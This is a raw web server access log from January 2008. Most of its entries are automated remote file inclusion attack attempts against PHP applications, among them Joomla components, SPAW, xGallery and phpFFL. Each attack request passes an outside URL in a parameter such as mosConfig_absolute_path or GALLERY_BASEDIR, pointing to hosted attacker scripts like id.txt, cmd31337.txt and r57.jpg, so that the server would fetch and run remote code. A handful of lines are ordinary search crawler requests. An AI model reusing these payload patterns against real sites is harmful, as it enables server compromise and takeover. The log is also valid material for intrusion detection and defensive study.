189.68.44.59 - - [10/Jan/2008:16:28:02 -0800] "GET /logs/access_071218.log//spaw/spaw_control.class.php?spaw_root=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.21.98.67 - - [10/Jan/2008:16:28:06 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://faz.edu.br/email/database/login? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.21.98.67 - - [10/Jan/2008:16:28:06 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://faz.edu.br/email/database/login? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.99.64 - - [10/Jan/2008:16:29:29 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.99.64 - - [10/Jan/2008:16:29:29 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.172.174.208 - - [10/Jan/2008:16:30:18 -0800] "GET //?mosConfig_absolute_path=http://pattaya-revealed.com/test.txt??? HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.172.174.208 - - [10/Jan/2008:16:30:20 -0800] "GET /logs//?mosConfig_absolute_path=http://pattaya-revealed.com/test.txt??? HTTP/1.1" 200 30152 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
200.21.98.67 - - [10/Jan/2008:16:37:46 -0800] "GET /logs/access_071229.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://faz.edu.br/email/database/login? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.223.142 - - [10/Jan/2008:16:37:46 -0800] "GET /logs/access_071220.log/components/com_joomlaxplorer/configuration.jx.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.223.142 - - [10/Jan/2008:16:37:46 -0800] "GET /components/com_joomlaxplorer/configuration.jx.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.223.142 - - [10/Jan/2008:16:37:46 -0800] "GET /logs/components/com_joomlaxplorer/configuration.jx.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.21.98.67 - - [10/Jan/2008:16:37:46 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://faz.edu.br/email/database/login? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.223.142 - - [10/Jan/2008:16:39:06 -0800] "GET /logs/access_071229.log/components/com_joomlaxplorer/configuration.jx.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.214.66 - - [10/Jan/2008:16:40:22 -0800] "GET /components/com_joomlaxplorer/configuration.jx.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.208.66 - - [10/Jan/2008:16:40:37 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.funnykit.co.kr/bemarket/imaker/html/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:16:40:50 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:16:40:50 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:16:40:50 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.92.236.83 - - [10/Jan/2008:16:40:53 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://daystarrecords.bizland.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.92.236.83 - - [10/Jan/2008:16:40:54 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://daystarrecords.bizland.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.92.236.83 - - [10/Jan/2008:16:40:54 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://daystarrecords.bizland.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.36.223.142 - - [10/Jan/2008:16:41:17 -0800] "GET /logs/access_071220.log/mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.223.142 - - [10/Jan/2008:16:41:17 -0800] "GET /mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.223.142 - - [10/Jan/2008:16:41:17 -0800] "GET /logs/mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.223.142 - - [10/Jan/2008:16:42:42 -0800] "GET /logs/access_071229.log/mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [10/Jan/2008:16:42:43 -0800] "GET /components/com_joomlaxplorer/configuration.jx.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.223.142 - - [10/Jan/2008:16:43:19 -0800] "GET /logs/access_071220.log/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.223.142 - - [10/Jan/2008:16:43:19 -0800] "GET /?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.223.142 - - [10/Jan/2008:16:43:19 -0800] "GET /logs/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 30147 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.223.142 - - [10/Jan/2008:16:44:37 -0800] "GET /logs/access_071229.log/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.214.66 - - [10/Jan/2008:16:46:10 -0800] "GET /logs/access_071220.log/components/com_joomlaxplorer/configuration.jx.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.214.66 - - [10/Jan/2008:16:46:10 -0800] "GET /logs/components/com_joomlaxplorer/configuration.jx.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.92.236.83 - - [10/Jan/2008:16:46:16 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://daystarrecords.bizland.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.229.194 - - [10/Jan/2008:16:47:11 -0800] "GET //skin/zero_vote/error.php?dir=http://www.paradiseradio.org/phpbo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [10/Jan/2008:16:47:42 -0800] "GET /logs/access_071220.log/components/com_joomlaxplorer/configuration.jx.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [10/Jan/2008:16:47:42 -0800] "GET /logs/components/com_joomlaxplorer/configuration.jx.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.208.66 - - [10/Jan/2008:16:47:49 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.funnykit.co.kr/bemarket/imaker/html/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.208.66 - - [10/Jan/2008:16:47:49 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.funnykit.co.kr/bemarket/imaker/html/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.148.27 - - [10/Jan/2008:16:47:58 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
72.55.148.27 - - [10/Jan/2008:16:47:58 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.193.214.66 - - [10/Jan/2008:16:49:13 -0800] "GET /logs/access_071229.log/components/com_joomlaxplorer/configuration.jx.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.40.194 - - [10/Jan/2008:16:50:33 -0800] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://djitkai.com/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
69.93.40.194 - - [10/Jan/2008:16:50:33 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://djitkai.com/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
72.29.68.248 - - [10/Jan/2008:16:52:54 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.248 - - [10/Jan/2008:16:52:54 -0800] "GET /index.php?pag=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.248 - - [10/Jan/2008:16:52:55 -0800] "GET /logs/index.php?pag=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.204.93 - - [10/Jan/2008:16:53:53 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.204.93 - - [10/Jan/2008:16:53:54 -0800] "GET /index.php?pag=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.204.93 - - [10/Jan/2008:16:53:54 -0800] "GET /logs/index.php?pag=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.22.74.129 - - [10/Jan/2008:16:55:53 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.25.30 - - [10/Jan/2008:16:56:56 -0800] "GET /logs/access_071202.log HTTP/1.0" 200 60645 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.0.78.8 - - [10/Jan/2008:16:57:21 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.laila.jp/item_pics/derf/vox.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.0.78.8 - - [10/Jan/2008:16:58:44 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.laila.jp/item_pics/derf/vox.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.0.78.8 - - [10/Jan/2008:16:58:44 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.laila.jp/item_pics/derf/vox.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.151.232.133 - - [10/Jan/2008:16:59:11 -0800] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://laserimpressionsllc.com/shop/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.151.232.133 - - [10/Jan/2008:16:59:12 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://laserimpressionsllc.com/shop/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.205.39 - - [10/Jan/2008:16:59:52 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.slmsistemas.net/components/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.205.39 - - [10/Jan/2008:17:01:15 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.slmsistemas.net/components/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.205.39 - - [10/Jan/2008:17:01:15 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.slmsistemas.net/components/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.10 - - [10/Jan/2008:17:01:16 -0800] "GET /minamijewelry/ HTTP/1.0" 200 2100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.19.200 - - [10/Jan/2008:17:01:33 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.151.232.133 - - [10/Jan/2008:17:03:30 -0800] "GET /logs/access_071214.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://laserimpressionsllc.com/shop/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.164 - - [10/Jan/2008:17:04:03 -0800] "GET /minamijewelry/?S=A HTTP/1.0" 200 2100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.194.240.135 - - [10/Jan/2008:17:04:37 -0800] "GET /logs/access_071229.log/page.php?s=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.194.240.135 - - [10/Jan/2008:17:04:38 -0800] "GET /page.php?s=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.194.240.135 - - [10/Jan/2008:17:04:38 -0800] "GET /logs/page.php?s=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.193.48 - - [10/Jan/2008:17:04:44 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.193.48 - - [10/Jan/2008:17:04:44 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.70.35.31 - - [10/Jan/2008:17:05:21 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://dd3str0y3r.110mb.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
195.70.35.31 - - [10/Jan/2008:17:05:21 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://dd3str0y3r.110mb.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
216.218.159.157 - - [10/Jan/2008:17:07:48 -0800] "GET /about.php?dir=http://www.proxycity.com/counter/.../response??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
216.218.159.157 - - [10/Jan/2008:17:07:48 -0800] "GET /logs/about.php?dir=http://www.proxycity.com/counter/.../response??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
74.6.22.204 - - [10/Jan/2008:17:09:40 -0800] "GET /logs/access_071208.log HTTP/1.0" 200 94709 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.176.188.8 - - [10/Jan/2008:17:10:07 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.40.194 - - [10/Jan/2008:17:10:15 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://djitkai.com/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
69.93.40.194 - - [10/Jan/2008:17:10:15 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://djitkai.com/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
62.75.204.93 - - [10/Jan/2008:17:10:21 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/vox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.204.93 - - [10/Jan/2008:17:10:22 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/vox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.204.93 - - [10/Jan/2008:17:10:22 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/vox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.204.93 - - [10/Jan/2008:17:10:23 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/vox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.204.93 - - [10/Jan/2008:17:10:23 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/vox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.204.93 - - [10/Jan/2008:17:10:24 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/vox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.204.93 - - [10/Jan/2008:17:10:24 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/vox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.204.93 - - [10/Jan/2008:17:10:24 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/vox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.204.93 - - [10/Jan/2008:17:10:24 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/vox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.204.93 - - [10/Jan/2008:17:10:30 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/vox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.204.93 - - [10/Jan/2008:17:10:30 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/vox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.204.93 - - [10/Jan/2008:17:10:30 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/vox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.15.59 - - [10/Jan/2008:17:11:37 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.15.59 - - [10/Jan/2008:17:11:37 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.137 - - [10/Jan/2008:17:13:20 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.75.193.48 - - [10/Jan/2008:17:16:17 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.193.48 - - [10/Jan/2008:17:16:17 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.208.66 - - [10/Jan/2008:17:16:27 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.funnykit.co.kr/bemarket/imaker/html/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:17:17:20 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:17:17:21 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:17:17:21 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:17:17:22 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:17:17:22 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:17:17:23 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:17:17:25 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:17:17:25 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:17:17:26 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:17:18:17 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:17:18:17 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:17:18:18 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.40.194 - - [10/Jan/2008:17:19:00 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://djitkai.com/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
69.93.40.194 - - [10/Jan/2008:17:19:00 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://djitkai.com/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:17:19:17 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:17:19:17 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:17:19:18 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
